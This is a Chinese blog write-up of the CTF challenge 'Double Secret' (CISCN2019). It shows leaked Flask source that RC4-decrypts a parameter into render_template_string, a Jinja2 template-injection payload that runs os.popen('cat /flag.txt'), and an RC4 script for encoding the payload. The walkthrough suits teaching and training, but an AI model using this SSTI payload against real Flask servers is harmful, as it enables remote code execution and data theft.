[CISCN2019 华东南赛区]Double Secret flask模板 rc4加密

已于 2022-10-30 13:25:39 修改
阅读量374 收藏 1
点赞数
分类专栏: ssti 文章标签: flask python 后端
于 2022-10-30 13:22:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/127598413
版权

 打开界面,这种要么让我们访问Secret页面,要么传参Secret

这里记得大小写的Secret都要尝试,然后让我们传参一个secret 以前碰到过这样进行输入源码,打算用脚本爆破,试一个比较大的值

File "/app/app.py", line 35, in secret
    if(secret==None):
        return 'Tell me your secret.I will encrypt it so others can\'t see'
    rc=rc4_Modified.RC4("HereIsTreasure")   #解密
    deS=rc.do_crypt(secret)
 
    a=render_template_string(safe(deS))
 
    if 'ciscn' in a.lower():
        return 'flag detected!'
Open an interactive python shell in this frame    ​return

 这里应该是进行了rc4的加密,解密密钥是HereIsTreasure

因为这是python中的flask模板界面,所以我们自然而然地可以想到用ssti模板注入

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag.txt').read()")}}{% endif %}{% endfor %}

需要一个rc4加密脚本,从网上搜一个

import base64
from urllib import parse

def rc4_main(key = "init_key", message = "init_message"):#返回加密后得内容
    s_box = rc4_init_sbox(key)
    crypt = str(rc4_excrypt(message, s_box))
    return  crypt

def rc4_init_sbox(key):
    s_box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s_box[i] + ord(key[i % len(key)])) % 256
        s_box[i], s_box[j] = s_box[j], s_box[i]
    return s_box
def rc4_excrypt(plain, box):
    res = []
    i = j = 0
    for s in plain:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        t = (box[i] + box[j]) % 256
        k = box[t]
        res.append(chr(ord(s) ^ k))
    cipher = "".join(res)
    return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))

key = "HereIsTreasure"  #此处为密文
message = input("请输入明文:\n")
enc_base64 = rc4_main( key , message )
enc_init = str(base64.b64decode(enc_base64),'utf-8')
enc_url = parse.quote(enc_init)
print("rc4加密后的url编码:"+enc_url)
#print("rc4加密后的base64编码"+enc_base64)

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Flask框架实现的前端RSA加密与后端Python解密功能详解
01-21
本文实例讲述了Flask框架实现的前端RSA加密与后端Python解密功能。分享给大家供大家参考,具体如下: 前言 在使用 Flask 开发用户登录API的时候,我之前都是明文传输 username 和 password。这种传输方式有一定的...
python flask开发模板
01-03
python flask框架开发模板,配置了数据库迁移(migrate) 日志logger 等 启动:python runserver.py 数据库迁移 :python manage.py db init
【BUUCTF】[CISCN2019 华东赛区]Double Secret
aoao331198的博客
04-22 1807
尝试/secret ?secret=1 输入长一点 发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码 仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.
[CISCN 2019华东]Double Secret
ph0ebus的博客
02-07 777
从一道赛题学习关于flask模板注入和了解RC4加密
[CISCN2019 华东赛区]Double Secret
shinygod的博客
04-10 526
知识点:flask的ssti注入,rc4加密 题目已经告诉我们两个Secret 再传个secret,随便输入个字符串会报凑。 作者已经很贴心的帮我们标出了重点。 对参数进行了解密,rc4算法,密钥HereIsTreasure exp脚本: import base64 from urllib import parse def rc4_main(key = "init_key", message = "init_message"):#返回加密后得内容 s_box = rc4_init_sbo
[CISCN2019 华东赛区]Double Secret flask的debug
qq_54929891的博客
04-10 1228
打开靶机可以发现什么都没有,扫目录发现robots.txt,console(secret页面不知道为啥我开始没有扫出来) 进入console是一个交互平台,需要pin值,有点像python的debug(我开始还在这里看了很久的js文件) robots.txt我以为会给几个地址呢,结果告诉是一个安卓ctf,对于现在水平的我感觉没多大帮助 secret终于有用了,告诉我们给他一个secret值,它会加密让别人看不见,不知道是不是flag,试试吧,便用GET或者POST方法上传secret参数试
[CISCN2019 华东赛区]Double Secret——还要加密
Mrs_H的博客
11-17 274
[CISCN2019 华东赛区]Double Secret 一.前言 这波属于是忙里偷闲了,面对着几篇大作业却没有任何思绪的我,默默打开了BUU的靶场,开始了我的“偷闲”之旅(doge。可能是最近临近期末的缘故,各个老师的作业数量都开始发力了。上个学期还都是1000字,1500字,最多也就3000字,这学期倒好上来直接8000大作业,直接给我干蒙了。算了,废话不多说了直接看题吧。 二.正文 首先,老样子先截一个“案发现场”的图 经典的没有前端界面,他让我们来找secret,所以我们去访问一下secret
基于Python的Flask应用模板设计源码
04-07
本项目是一个基于Python语言开发的Flask应用模板,包含30个文件,主要文件类型包括Python...系统设计旨在为用户提供一个便捷的Flask应用开发模板,支持蓝本(Blueprint)的使用,以满足用户在开发Flask应用方面的需求。
Flask模板引擎Jinja2使用实例
09-17
主要介绍了Flask模板引擎Jinja2使用实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
题解([RootersCTF2019]I_<3_Flask,[CISCN2019 华东赛区]Double Secret,[CISCN2019 华东赛区]Web4)
2202_75361164的博客
11-12 158
抓取/flag,并且将session更改为:eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.ZUjA4g.TDHugXodYeccRQbQmc1SZh9CffA。直接看/flag路由,发现session[‘username’] == 'fuck’时给flag,所以要伪造session,不过我们需要先得到密钥。发现被过滤了,有点不对劲,尝试/index.php发现404,推测为python,尝试。成功,尝试读取/flag,被过滤了。3.读取/app/app.py。
rc4加解密脚本。。
01-16
rc4加解密脚本。。
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
RC4文件加密的python实现方法
09-21
主要介绍了RC4文件加密的python实现方法,实例分析了RC4文件加密的原理与Python实现技巧,需要的朋友可以参考下
攻防世界crypt做法(附Rc4原理和解密脚本)
最新发布
2303_80796023的博客
05-16 905
这个也是对数组的每一位进行了操作,可能是打乱数组S,或者是生成密钥流什么的,也不清楚,但到这里,我们就可以大胆的猜测这个是Rc4算法了,然后去找关键变量,脚本解密即可,这边我们已知关键变量密钥(主函数str数组存的字符串),密文(主函数if条件中,右侧数组byte_14013B000[i]^0x22之后的结果),有这两个关键变量已经ok了,接下来是Rc4的解密脚本,1,密钥K,长度1-256字节,密钥的长度与明文长度密钥流长度没必然关系,通常16字节。好,那么好,Rc4算法简单介绍完了,那么开始做题。
[BJDCTF 2020]encode
2201_76139143的博客
12-30 990
1、先初始化状态向量S(256个字节,用来作为密钥流生成的种子1)按照升序,给每个字节赋值0,1,2,3,……,254,255在sub_8048CC2函数中可以看见(第14行),2、初始密钥(由用户输入)长度任意如果输入长度小于256个字节,则进行轮转,直到填满例如输入密钥的是1,2,3,4,5 , 那么填入的是1,2,3,4,5,1,2,3,4,5,1,2,3,4,5........由上述轮转过程得到256个字节的向量T(用来作为密钥流生成的种子2)
C语言实现RC4加解密算法
P1umH0的博客
11-19 6688
C语言实现RC4加解密算法RC4加解密 RC4加解密 #include<stdio.h> void rc4_init(unsigned char* s, unsigned char* key, unsigned long Len_k) { int i = 0, j = 0; char k[256] = { 0 }; unsigned char tmp = 0; for (i = 0; i < 256; i++) { s[i] = i; k[i] = key[i % Len_
RC4加密——python实现&java实现
飞得更高肥尾沙鼠
03-21 2237
RC4加密——python实现&java实现
[GUET-CTF2019]encrypt 题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
05-13 1081
我们如果能得到每次循环的这个数据,与base64解密得到结果(RC加密后的密文)依次异或就能得到明文。我们可以将byte_602080提取出来,下面是提取数据的IDC脚本,得到了密文。这个需要远程动态调试,我们需要在88次循环中截取到每次最后进行异或的这个数据。本题是输入了一个字符串,进行了rc4加密,和魔改的base64加密。我们RC4解密时候,不编写整个RC4加密算法的解密脚本。发现此时edx存储的正是这个要和明文异或的数据。这是使用脚本自动化动态调试得到的每次的数据。魔改的base64加密
flask模板渲染步骤
05-12
Flask使用Jinja2模板引擎来渲染模板。以下是Flask模板渲染的步骤: 1. 在Flask应用程序中设置模板文件夹路径。例如: ```python app = Flask(__name__, template_folder='templates') ``` 2. 创建一个模板文件,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值